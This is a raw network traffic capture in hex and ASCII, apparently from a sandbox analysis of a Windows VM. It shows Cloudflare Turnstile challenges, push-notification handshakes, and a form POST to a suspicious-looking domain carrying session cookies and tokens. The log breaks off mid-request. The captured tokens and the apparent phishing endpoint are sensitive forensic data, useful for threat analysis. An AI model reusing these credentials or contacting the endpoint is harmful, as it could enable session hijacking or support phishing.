2024-07-03 07:40:43 UTC	1369	IN	Data Raw: 76 37 74 35 50 6e 44 38 4f 6a 6f 32 50 72 72 78 77 50 35 37 77 62 54 2f 76 4c 30 34 41 4c 35 39 78 63 4d 42 76 73 62 45 41 44 61 41 52 51 45 47 75 63 59 43 52 2f 34 4a 41 7a 6d 36 78 38 52 36 75 38 64 46 68 51 33 46 68 6b 76 4c 79 55 63 39 76 63 77 49 53 41 37 4c 79 59 6b 42 43 55 79 4b 45 4d 31 4c 41 63 70 4f 54 41 4d 48 54 34 7a 4a 44 59 55 51 6b 56 54 50 56 68 53 58 30 31 42 56 6a 31 51 52 46 70 66 56 55 6c 49 59 32 52 4d 59 6d 39 67 55 6c 42 7a 58 56 5a 55 63 32 56 5a 62 32 39 6e 58 56 78 2f 61 56 39 51 50 48 52 6b 51 46 56 79 63 6d 69 48 65 57 32 43 68 34 42 76 63 45 79 42 64 55 2b 54 6b 48 6c 6f 6b 34 74 37 62 48 31 39 67 4a 61 6a 6a 34 4e 31 6d 35 4b 4a 59 32 53 59 69 34 79 72 6d 6f 2b 41 72 36 53 65 6c 59 47 69 6c 35 68 34 70 5a 36 63 67 4b 6d 69 Data Ascii: v7t5PnD8Ojo2PrrxwP57wbT/vL04AL59xcMBvsbEADaARQEGucYCR/4JAzm6x8R6u8dFhQ3FhkvLyUc9vcwISA7LyYkBCUyKEM1LAcpOTAMHT4zJDYUQkVTPVhSX01BVj1QRFpfVUlIY2RMYm9gUlBzXVZUc2VZb29nXVx/aV9QPHRkQFVycmiHeW2Ch4BvcEyBdU+TkHlok4t7bH19gJajj4N1m5KJY2SYi4yrmo+Ar6SelYGil5h4pZ6cgKmi

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:44 UTC	487	OUT	GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:40:44 UTC	375	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 07:40:44 GMT Content-Type: application/json Content-Length: 7 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: dz1z/F5Y/H+JvFOJLnjQBg==$4H114BBoHY4JTvNfzKIetg== Server: cloudflare CF-RAY: 89d53aab4c9e728a-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:40:44 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:48 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 5a 39 39 2b 4f 31 79 4f 6b 75 59 65 7a 54 59 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 31 62 65 37 64 32 64 32 33 62 64 66 31 34 62 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: KZ99+O1yOkuYezTY.1Context: 21be7d2d23bdf14b
2024-07-03 07:40:48 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-03 07:40:48 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4b 5a 39 39 2b 4f 31 79 4f 6b 75 59 65 7a 54 59 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 31 62 65 37 64 32 64 32 33 62 64 66 31 34 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: KZ99+O1yOkuYezTY.2Context: 21be7d2d23bdf14b<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
2024-07-03 07:40:48 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 4b 5a 39 39 2b 4f 31 79 4f 6b 75 59 65 7a 54 59 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 31 62 65 37 64 32 64 32 33 62 64 66 31 34 62 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: KZ99+O1yOkuYezTY.3Context: 21be7d2d23bdf14b
2024-07-03 07:40:48 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-03 07:40:48 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 38 4d 58 51 37 68 4c 72 4b 45 75 35 32 7a 2b 54 77 69 4d 73 4c 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 8MXQ7hLrKEu52z+TwiMsLg.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:52 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 52 54 45 32 4b 38 35 6f 45 61 59 46 7a 33 36 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 66 65 65 31 62 65 63 33 61 31 65 38 39 65 36 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: iRTE2K85oEaYFz36.1Context: bfee1bec3a1e89e6
2024-07-03 07:40:52 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-03 07:40:52 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 69 52 54 45 32 4b 38 35 6f 45 61 59 46 7a 33 36 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 66 65 65 31 62 65 63 33 61 31 65 38 39 65 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: iRTE2K85oEaYFz36.2Context: bfee1bec3a1e89e6<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
2024-07-03 07:40:52 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 69 52 54 45 32 4b 38 35 6f 45 61 59 46 7a 33 36 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 66 65 65 31 62 65 63 33 61 31 65 38 39 65 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: iRTE2K85oEaYFz36.3Context: bfee1bec3a1e89e6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-03 07:40:52 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-03 07:40:52 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 49 59 59 6c 41 31 6c 59 64 55 79 51 46 41 57 70 4f 77 66 39 43 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: IYYlA1lYdUyQFAWpOwf9Cg.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:41:00 UTC	917	OUT	POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 32509 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: e7db8d6cd2b6574 sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 07:41:00 UTC	16384	OUT	Data Raw: 76 5f 38 39 64 35 33 61 37 35 39 65 63 38 30 63 62 34 3d 44 6a 43 48 58 55 47 4c 59 47 2d 62 43 51 49 2d 51 2d 59 48 32 43 63 49 63 78 47 41 73 42 48 52 2d 63 33 73 4e 73 43 6a 47 64 73 24 73 42 4d 48 73 4f 43 73 49 48 47 43 55 78 6b 73 79 78 48 52 6a 55 75 73 66 4f 2d 68 70 71 73 51 59 47 51 73 47 41 31 4f 43 48 6e 57 6d 70 79 73 6e 53 61 38 73 52 37 77 54 73 54 6f 43 73 33 57 2d 38 49 48 41 39 71 73 44 34 6a 6a 75 30 33 73 73 54 31 73 44 59 48 73 44 45 4f 4d 47 79 76 63 47 78 51 54 50 24 6a 73 52 4d 4b 55 73 47 44 76 76 4f 55 61 72 35 77 55 42 53 68 69 62 31 51 49 2d 44 4d 5a 44 4d 73 44 62 61 73 24 65 37 4e 7a 42 32 61 73 54 53 42 47 76 75 25 32 62 75 4b 32 50 54 48 62 4f 69 48 45 6a 4a 4f 45 42 33 71 42 50 7a 50 53 79 30 79 49 69 78 5a 38 55 38 79 51 Data Ascii: v_89d53a759ec80cb4=DjCHXUGLYG-bCQI-Q-YH2CcIcxGAsBHR-c3sNsCjGds$sBMHsOCsIHGCUxksyxHRjUusfO-hpqsQYGQsGA1OCHnWmpysnSa8sR7wTsToCs3W-8IHA9qsD4jju03ssT1sDYHsDEOMGyvcGxQTP$jsRMKUsGDvvOUar5wUBShib1QI-DMZDMsDbas$e7NzB2asTSBGvu%2buK2PTHbOiHEjJOEB3qBPzPSy0yIixZ8U8yQ
2024-07-03 07:41:00 UTC	16125	OUT	Data Raw: 48 63 61 73 78 47 46 73 63 48 61 61 73 75 55 6a 63 69 73 4b 4d 62 4b 6e 48 63 74 73 4c 73 5a 73 24 4d 73 65 2b 2d 48 51 43 55 64 73 69 48 78 2b 79 33 73 67 48 51 73 55 67 73 47 62 24 59 55 78 73 53 48 33 2d 63 75 73 79 73 42 72 68 47 48 55 48 33 2d 55 6f 33 68 73 33 69 34 4a 73 63 48 44 61 63 59 73 6c 48 47 35 73 30 73 55 48 78 49 73 4d 73 65 61 42 48 55 4a 73 74 2d 54 48 63 2b 73 70 61 24 73 63 2d 73 77 4c 52 43 55 67 73 4c 73 52 43 73 33 73 45 73 73 75 47 70 43 4f 4d 24 73 63 71 4d 47 48 52 43 73 30 73 75 73 24 73 73 77 6a 54 69 6e 62 47 4c 73 69 62 54 78 47 46 73 74 56 71 4f 37 2b 73 6c 48 33 61 24 54 73 71 48 73 59 55 2d 73 55 2d 54 49 43 6e 73 64 73 52 61 47 65 48 6f 73 61 73 63 31 65 43 52 43 47 72 73 78 59 78 6a 55 70 73 6a 48 51 6b 47 46 73 6c 48 Data Ascii: HcasxGFscHaasuUjcisKMbKnHctsLsZs$Mse+-HQCUdsiHx+y3sgHQsUgsGb$YUxsSH3-cusysBrhGHUH3-Uo3hs3i4JscHDacYslHG5s0sUHxIsMseaBHUJst-THc+spa$sc-swLRCUgsLsRCs3sEssuGpCOM$scqMGHRCs0sus$sswjTinbGLsibTxGFstVqO7+slH3a$TsqHsYU-sU-TICnsdsRaGeHosasc1eCRCGrsxYxjUpsjHQkGFslH
2024-07-03 07:41:01 UTC	1257	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:41:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 3420 Connection: close cf-chl-out-s: tjpXjza9oG9wsiFVxOju7aNcaDqcXQX4r2CzNnJcQq9p7O5ZHHAWxhx5TkTRRXA9hhKIT+9wravg8gH4upgM/l82R2Kmh5PBq4tSqnk/XHGzTItneRq8KVKesRDMiOBVkE60A0jiz7leUMaC+1851ixC3iDQk4rwf2tF89DuVOe1iY2Jw/MoTlTzwxDCrQT9Rn1GwLbVoqfPkeG7Q2fxNTx33QkdP5PjaJP+XDEI05b3HDMtiKfuzF3YY5xhjdNWXql1MFJbydDmWaufPJ8YZPhrpXD4wAc4tX31y05UpDj2hMxT3zsknLvYI5R5aFSFwOnDtiqDjqG49kTEqnHFsP7BkP8kKVvRMw9XEiMaDqIlNXUxct4ESGS5XoKmQDQHhPCpmOKgU64fxQbjUn8re+Sr2FvEi4SuB9nrNajdgHHpXMlEDr4M5SYN1dgBpIGs7Bb53TtplDRKZt/Az0jc3FlAJdGoRLL0V8She9sVpOYJD4+LFHbD5nvjqUCKRi+6PPUMwYLLBySELHv0yPsNbeOsKUfOoHopZTuKab3c4M2FA8eDnZDymxkZ3liPgzpwjXagFgK1xaevHiezXxkCst/zhUxjx2NKGsAKU54yjUMVnUD6siKebyeZjI4Jp/plVi/PqNJ9A88UxiC3vDr2Y8lk9DkmnFuAt/wK+r+ItYdohqdlOEsM35szzt70tn5ZyjY30Eha3Mv6IM7DlO+9RbbSuh6DlbtoEqY93rO/gKrkxxGeKKju8fKi4SUmjizScL+HFE1wJK5DdnZRVCy+67kE6HThl0qzv5kH6BQPVWmBPy3j7aPdY5RB1jinsifu$zHDgCOLx1wDoOXuq3kUqLg== cf-chl-out: lVhfafTAXYfOGGKm7C8iFuOoOv55e1N+tQQI4xFiGRycHJhGzoDiKMsPydjTmF4yGJXPPYFOP7sFvM5see4+P3s9N42QTPKoD5WvlK/JIabcUBNWsgAbaS2Z/9Pr7kIS$ibOxvc6khR7WPFXBoWsMRQ== Server: cloudflare CF-RAY: 89d53b118cd74241-EWR alt-svc: h3=":443"; ma=86400
2024-07-03 07:41:01 UTC	112	IN	Data Raw: 78 72 66 41 67 38 71 35 7a 59 61 4f 76 4d 32 49 6e 5a 32 6d 6a 71 6e 57 74 62 72 43 6c 4e 4f 36 30 72 4c 5a 7a 74 47 64 32 70 76 42 32 62 57 37 77 38 62 70 78 36 75 2b 6f 73 6a 46 76 75 4b 74 79 63 4c 6d 72 39 44 37 2b 72 7a 58 74 74 66 35 33 75 54 77 2b 38 54 63 38 66 4c 45 34 41 59 48 7a 67 73 4d 32 38 73 4b 31 4d 33 71 7a 68 6a 78 Data Ascii: xrfAg8q5zYaOvM2InZ2mjqnWtbrClNO60rLZztGd2pvB2bW7w8bpx6u+osjFvuKtycLmr9D7+rzXttf53uTw+8Tc8fLE4AYHzgsM28sK1M3qzhjx
2024-07-03 07:41:01 UTC	1369	IN	Data Raw: 38 67 37 57 42 74 33 59 44 41 72 79 37 66 77 4f 39 67 50 77 49 75 6b 69 4c 68 76 73 4b 43 45 4d 4b 66 49 4c 49 69 73 76 43 79 51 78 4e 42 4d 51 2b 68 38 74 45 52 35 46 48 68 34 68 52 78 6b 48 4a 78 6b 56 41 43 59 62 53 6b 4a 41 55 41 73 7a 54 55 38 33 53 6c 51 39 4d 54 73 58 4e 30 78 4c 5a 45 46 50 4e 68 31 4a 47 32 5a 6f 50 7a 74 62 57 30 4a 53 53 45 31 6d 4c 56 4e 4b 4b 6b 70 48 64 56 70 6d 58 48 4a 58 62 31 4e 68 55 31 78 7a 59 33 42 5a 51 57 64 71 58 6e 70 2b 62 57 5a 45 6c 46 78 52 54 32 69 46 64 57 39 38 6b 34 5a 2b 58 6e 70 35 6c 4a 2b 68 66 4a 31 39 63 58 39 67 6c 5a 61 42 69 6f 4f 51 72 47 2b 64 67 32 36 4a 72 6f 32 70 67 71 61 5a 72 72 61 74 75 6f 75 41 6f 37 4f 7a 65 49 43 42 6b 72 61 33 67 6f 4f 41 77 38 2b 4e 71 34 6d 55 30 4a 43 69 7a 63 76 Data Ascii: 8g7WBt3YDAry7fwO9gPwIukiLhvsKCEMKfILIisvCyQxNBMQ+h8tER5FHh4hRxkHJxkVACYbSkJAUAszTU83SlQ9MTsXN0xLZEFPNh1JG2ZoPztbW0JSSE1mLVNKKkpHdVpmXHJXb1NhU1xzY3BZQWdqXnp+bWZElFxRT2iFdW98k4Z+Xnp5lJ+hfJ19cX9glZaBioOQrG+dg26Jro2pgqaZrratuouAo7OzeICBkra3goOAw8+Nq4mU0JCizcv
2024-07-03 07:41:01 UTC	1369	IN	Data Raw: 75 48 77 45 76 73 59 34 74 30 49 35 2b 58 72 2f 42 7a 6f 42 53 6f 6d 37 77 6f 75 4a 67 41 32 49 69 50 34 46 50 73 73 2b 30 41 4d 2b 2f 34 63 50 7a 55 59 52 53 45 67 46 55 74 47 53 52 6f 70 4d 46 45 6a 51 44 42 45 4a 69 35 54 4d 53 74 48 56 7a 41 62 4f 52 64 4e 48 47 49 63 57 6a 64 42 53 47 67 36 52 53 68 63 4c 6a 70 41 63 55 42 4e 62 6d 39 47 54 6d 39 6a 4f 47 73 38 61 45 39 4a 65 32 39 53 67 33 39 6a 52 57 46 6b 69 46 6d 4c 53 48 68 4d 6b 46 32 41 59 6d 32 54 68 57 52 68 6d 70 6c 71 5a 6d 6c 36 62 6e 5a 66 6f 57 46 39 59 35 39 30 67 61 4b 6d 65 70 75 6e 6d 33 36 4a 61 4a 75 43 74 49 53 79 68 62 65 7a 6f 6f 75 4f 72 34 79 2f 72 4c 61 41 73 62 2b 62 67 4d 61 68 6d 63 53 2b 6f 62 57 57 77 61 36 48 73 4d 53 51 6e 73 2b 68 72 72 65 7a 78 4b 75 50 72 73 2b 31 Data Ascii: uHwEvsY4t0I5+Xr/BzoBSom7wouJgA2IiP4FPss+0AM+/4cPzUYRSEgFUtGSRopMFEjQDBEJi5TMStHVzAbORdNHGIcWjdBSGg6RShcLjpAcUBNbm9GTm9jOGs8aE9Je29Sg39jRWFkiFmLSHhMkF2AYm2ThWRhmplqZml6bnZfoWF9Y590gaKmepunm36JaJuCtISyhbezoouOr4y/rLaAsb+bgMahmcS+obWWwa6HsMSQns+hrrezxKuPrs+1
2024-07-03 07:41:01 UTC	570	IN	Data Raw: 73 5a 4b 69 73 57 39 2f 67 6a 2f 41 73 6f 4e 41 66 74 46 43 73 5a 4a 68 49 31 4a 43 30 35 4e 2f 77 34 49 44 77 2b 4e 68 41 36 42 66 34 55 50 79 41 38 4b 69 74 4b 52 54 4e 4d 53 46 45 31 54 30 73 7a 45 31 59 76 46 54 31 59 57 44 51 31 51 55 77 76 51 32 4a 51 61 6a 5a 6c 51 45 74 4c 62 30 51 71 62 47 35 47 4c 57 4a 31 54 48 55 30 57 56 46 4c 65 6e 68 70 4d 7a 35 39 62 45 35 67 65 6e 39 35 68 49 4f 45 66 59 79 51 65 70 46 7a 69 6c 4e 79 63 49 39 31 61 31 71 55 57 35 42 35 69 48 4e 66 62 71 4f 42 6c 5a 75 6d 59 46 75 62 68 32 6c 71 69 49 79 6f 70 6e 2b 50 63 4b 71 47 73 48 43 58 6d 61 2b 6d 71 4c 69 62 65 48 4f 79 6f 48 79 65 6f 4c 32 37 6e 37 75 71 68 4c 33 46 72 4d 6a 41 73 38 75 68 73 72 53 7a 79 38 79 33 75 4c 6e 51 79 39 61 59 6e 74 4c 42 77 62 37 45 33 Data Ascii: sZKisW9/gj/AsoNAftFCsZJhI1JC05N/w4IDw+NhA6Bf4UPyA8KitKRTNMSFE1T0szE1YvFT1YWDQ1QUwvQ2JQajZlQEtLb0QqbG5GLWJ1THU0WVFLenhpMz59bE5gen95hIOEfYyQepFzilNycI91a1qUW5B5iHNfbqOBlZumYFubh2lqiIyopn+PcKqGsHCXma+mqLibeHOyoHyeoL27n7uqhL3FrMjAs8uhsrSzy8y3uLnQy9aYntLBwb7E3

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:41:01 UTC	1420	OUT	POST /wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag HTTP/1.1 Host: vkwek.ckyucle.com Connection: keep-alive Content-Length: 1213 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygZ26iAPVbOuoG7fS Accept: / Origin: https://vkwek.ckyucle.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://vkwek.ckyucle.com/2DUx/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6Ii9RdnVXMlk4Q0pJOFlzbnA2bDRxWXc9PSIsInZhbHVlIjoia0llVG1KMVREc0xvbDVLeVR1Y2wrYTdaNjFmRlY4d2RBSFRacldCbHg4M0x2RWVaTncyMEtlV1JDYnlxejdjbTZUZzBRMmhTWHRpYzhxQlRkK2JkZzJxS1dLMWFRVUg5TEhPa1RBczRwaC9QbU94UFZCN3huU3ordDN3cHFpdWQiLCJtYWMiOiI3MTEwZTM5YzMwMTJmODU5ZWVlYWE3OTJjYWM2ZDkyODU1ZTEwMmJiNjZiNGQxODE4ZTM0YzE4YzczMWM0OGRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZvOEpGSFdCQnIrMzkrenRNc1dQN3c9PSIsInZhbHVlIjoiTkVFZTNSeUR5c0IwaWxVN0FTOGlORGtXUy9nVWR0NGhLRFpRYnFoTUJlSjhmTGdtR0srUnVSTTdKR3l2QjlxY0Q0N3lHMVpaZFQ0d1l6ZFkxK01mN0tJMnE0eVl5V0daekViWUZOWjJmQ0p5YmZGUmwxTXAwWDRtUUZVUnVwWGwiLCJtYWMiOiI4ODFkOTBjYjRmMWIxOTQxMDI0NWJmZmM2MDFhM2FhZGNjNjI4ODc0NWQwZGNiNDY5ZTRhZGUzOWVhZmVhMjk3IiwidGFnIjoiIn0%3D
2024-07-03 07:41:01 UTC	1213	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 67 5a 32 36 69 41 50 56 62 4f 75 6f 47 37 66 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 51 58 6c 34 6c 68 6a 45 44 63 78 77 64 77 47 4f 6b 4c 4d 65 38 47 36 4f 34 77 6a 6c 4f 4b 77 75 39 36 50 63 78 7a 61 49 57 39 34 4a 5f 42 2d 6e 31 55 39 6e 34 6f 43 72 34 66 52 64 58 4c 38 4f 66 4c 57 77 37 55 74 56 48 4e 4c 55 38 52 6d 6a 4d 6b 46 42 38 53 6a 36 6f 41 78 5f 71 37 46 79 6d 58 44 30 71 47 43 46 4b 59 32 71 55 4d 4c 51 6f 5f 61 59 55 6c 68 5a 68 47 77 4c 39 7a 31 65 75 32 35 58 42 6d 32 4a 45 6f 78 47 51 31 36 36 6b 74 71 Data Ascii: ------WebKitFormBoundarygZ26iAPVbOuoG7fSContent-Disposition: form-data; 